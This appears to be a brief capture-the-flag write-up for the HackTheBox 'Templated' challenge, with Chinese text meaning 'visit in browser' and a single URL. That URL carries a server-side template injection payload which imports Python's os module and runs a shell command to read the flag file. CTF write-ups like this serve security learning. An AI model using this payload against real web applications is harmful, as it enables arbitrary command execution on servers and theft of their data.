HackTheBox-CTF-Templated

Can you exploit this simple mistake?

20210411-14:19:02-_nq9Z0h_dKlHrF

20210411-14:19:21-_t3r1gP_jGwF0r

20210411-14:22:13-_flcyqD_kPIUpO

浏览器访问

1
http://138.68.182.108:31553/{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}